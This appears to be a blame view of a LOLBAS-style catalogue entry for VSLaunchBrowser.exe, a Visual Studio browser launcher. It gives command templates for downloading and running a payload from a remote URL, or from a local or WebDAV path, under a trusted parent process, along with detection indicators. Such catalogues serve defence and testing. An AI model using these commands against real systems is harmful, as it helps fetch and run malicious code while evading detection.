2024-10-01 23:37:11 +02:00
---
Name : VSLaunchBrowser.exe
Description : Microsoft Visual Studio browser launcher tool for web applications debugging
Author : Avihay Eldad
Created : 2024-04-12
Commands :
2025-01-28 12:15:01 +01:00
- Command : VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
2024-10-01 23:37:11 +02:00
Description : Download and execute payload from remote server
Usecase : It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category : Download
Privileges : User
MitreID : T1105
OperatingSystem : Windows
Tags :
- Download : INetCache
2025-01-28 12:15:01 +01:00
- Command : VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
2024-10-01 23:37:11 +02:00
Description : Execute payload via VSLaunchBrowser as parent process
Usecase : It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category : Execute
Privileges : User
MitreID : T1127
OperatingSystem : Windows
2024-12-29 18:31:01 +01:00
Tags :
- Execute : EXE
2025-01-28 12:15:01 +01:00
- Command : VSLaunchBrowser.exe .exe {PATH_SMB}
2024-10-01 23:37:11 +02:00
Description : Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase : It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category : Execute
Privileges : User
MitreID : T1127
OperatingSystem : Windows
2024-12-29 18:31:01 +01:00
Tags :
- Execute : EXE
- Execute : Remote
2024-10-01 23:37:11 +02:00
Full_Path :
2024-10-02 00:14:19 +02:00
- Path : C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
- Path : C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
2024-10-01 23:37:11 +02:00
Detection :
- IOC : cmd.exe as sub-process of VSLaunchBrowser
- IOC : URL on a VSLaunchBrowser command line
- IOC : VSLaunchBrowser making unexpected network connections or DNS requests
Acknowledgement :
- Person : Avihay Eldad
Handle : '@AvihayEldad'